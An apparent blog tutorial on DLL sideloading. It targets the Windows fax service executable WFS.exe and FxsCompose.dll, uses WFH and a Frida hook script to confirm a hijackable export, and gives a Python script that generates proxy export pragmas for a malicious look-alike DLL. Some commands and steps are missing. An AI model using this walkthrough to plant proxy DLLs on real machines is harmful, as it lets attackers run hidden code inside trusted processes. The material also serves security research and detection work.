DLL sideloading is a technique that attackers can use to inject malicious code into a legitimate process by replacing or "sideloading" a dynamic-link library (DLL) that the process is dependent on. This can be a serious security concern because it allows attackers to execute arbitrary code on a victim's machine without the victim's knowledge.
To identify potential DLL sideloading hijacks, there are a few approaches you can take. One option is to use the WFH (Windows Function Hijacking) tool, which is specifically designed to detect DLL function hijacks. WFH is able to identify both DLLMain hijacks and GetProcAddress hijacks.
Alternatively, you can manually detect DLL sideloading hijacks using the Frida tool. To do this, you can use the Frida command line interface to attach to a running executable and then use a JavaScript script called "loadlibrary.js" (comes with WFH tool) to monitor for DLL loads.
To run WFH or Frida to detect DLL sideloading hijacks, you can use the following commands:
When using either of these tools, you should be on the lookout for the following string of text in the output or log file, as it indicates a potential DLL export sideloading attack:
In this blogpost, we'll be hijacking WFS.exe which is present in Windows 11 operating system (if Windows fax service is enabled)
Is that function really called
It is worth noting that the GetProcAddress functions listed in the output above may not always indicate a DLL sideloading attack. This can happen because the function call may have been prepared in advance using GetProcAddress, but the function was never actually called due to the arguments passed or the executable taking a different code path.
To find for sure if the function was called (which would result in DLL sideload) we will use another frida script as below
sure.js
// to make sure the dll is loaded before the function intercept is introduced
const dllName = "C:\\WINDOWS\\SYSTEM32\\FxsCompose.dll";
Module.load(dllName);
//find the address of the function
var pHrInitComposeFormDll = Module.findExportByName("FxsCompose.dll","HrInitComposeFormDll");
//intercept the call
Interceptor.attach(pHrInitComposeFormDll, {
onEnter: function (args) {
send("The function was called")
},
onLeave: function (retval) {
}
});
To load this use the following command . Make note of --pause argument. The argument is used to pause the execution of the exe, allowing the script to load properly before exe runs
after running this, you will be in a pause state in frida console . Use the following command in frida console to continue execution of executable
%resume
If you see the string "The function was called" in the output, it means that the function has been called and the DLL sideload will function as expected. This is a confirmation that the DLL sideloading attack was successful.
We see that the string "The function was called", which confirms the presence of DLL sideload.
Making a Sideloadable DLL
This is the point where many people just insert their payload into the DLLMain function and consider the task complete.
Here's how to do it quickly and correctly
Step 1: Create a DLL project
Step 2: You will see a blank project like below
Step 3: Create the pragma comment for proxying the calls to the original DLL. Use the following script to generate them quickly
comment.py
import pefile
import optparse
import os
def test(path):
if os.path.exists(path)==False:
print("[-] File Not Found:{}".format(path))
else:
dllname=str(path).rstrip(".dll")
formats="#pragma comment(linker,\"/export:{funcion}={dllname}.{funcion_},@{ordinal}\")"
pe=pefile.PE(path)
modules=pe.DIRECTORY_ENTRY_EXPORT.symbols
for module in modules:
modulename=module.name.decode()
print(formats.format(funcion=modulename,dllname=dllname,funcion_=modulename,ordinal=module.ordinal))
if __name__ == '__main__':
parser=optparse.OptionParser()
parser.add_option('-f',dest="file",help="Dll Path")
(option,args)=parser.parse_args()
if option.file:
test(option.file)
else:
print("Usage:python comment.py -f C:\\Windows\\System\\kernel32.dll")
parser.print_help()
Line number 3 defines the function name to redirect the call to when HrInitComposeFormDll is called
Add the module definition setting in Visual Studio
Step 8: Make the proxy function
Before we add the proxy function, we need to make a typedef of the original function(HrInitComposeFormDll). This is required to pass the call to the original HrInitComposeFormDll once we load our payload
the typedef is very similar to the function definition we saw in the Ghidra decompilation
